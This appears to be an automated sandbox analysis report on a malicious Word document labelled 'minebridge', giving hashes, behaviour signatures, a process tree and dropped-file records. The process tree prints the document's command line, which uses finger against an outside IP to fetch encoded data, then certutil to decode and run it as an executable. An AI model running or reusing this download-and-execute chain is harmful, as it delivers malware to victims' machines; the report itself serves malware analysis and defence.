Overview

overview

10

Static

static

8

321b5dbbc3...ge.doc

windows7_x64

10

321b5dbbc3...ge.doc

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    16-01-2021 06:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc

  • Size

    118KB

  • MD5

    f95643710018c437754b8a11cc943348

  • SHA1

    f590e1b6a80cf3e8360388382eabb04b3e247b78

  • SHA256

    321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67

  • SHA512

    f39abfd51e62f145376b5587cd515072e01740e10e967f401057c00403017c6754264bed08f8bef819829a80762ce572b40463b7854db33a961ff2e624509fba

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\321b5dbbc36ac4946955905f9dd4f44b15df30cbfd7d2be1d8b6171c1ee71b67_minebridge.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:932
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1996
    • C:\Windows\system32\cmd.exe
      cmd /C finger nc20@184.164.146.102 > %appdata%\vUCooUr >> %appdata%\vUCooUr1 && certutil -decode %appdata%\vUCooUr1 %appdata%\vUCooUr.exe &&cmd /C del %appdata%\vUCooUr1 && %appdata%\vUCooUr.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\system32\finger.exe
        finger nc20@184.164.146.102
        2⤵
          PID:1060
        • C:\Windows\system32\certutil.exe
          certutil -decode C:\Users\Admin\AppData\Roaming\vUCooUr1 C:\Users\Admin\AppData\Roaming\vUCooUr.exe
          2⤵
            PID:2020

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Discovery

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\vUCooUr1
          MD5

          cf1c89f9c31ba34c4a84c26e13f9c6a2

          SHA1

          3ffe882b0b0df619e046d6b589438b5652fb9b17

          SHA256

          29d9868db914315b380fa6629d7205fe2c00f8186c4164a08fd30c4fe449793c

          SHA512

          5b1d2c81ac636a9ead6b99fa510ad9a8b604072c9a82a7b3d2e1e6f4c0d82556b4ab1de761fd8f0798b871e8b8f3a4bf7345e9625f11cbfe653857e00dc84aab

          Download Submit
        • memory/932-3-0x00000000008F3000-0x00000000008F5000-memory.dmp
          Filesize

          8KB

          Download
        • memory/932-4-0x00000000008F5000-0x00000000008F9000-memory.dmp
          Filesize

          16KB

          Download
        • memory/1060-5-0x0000000000000000-mapping.dmp
          Download
        • memory/1996-2-0x0000000000000000-mapping.dmp
          Download
        • memory/2020-6-0x0000000000000000-mapping.dmp
          Download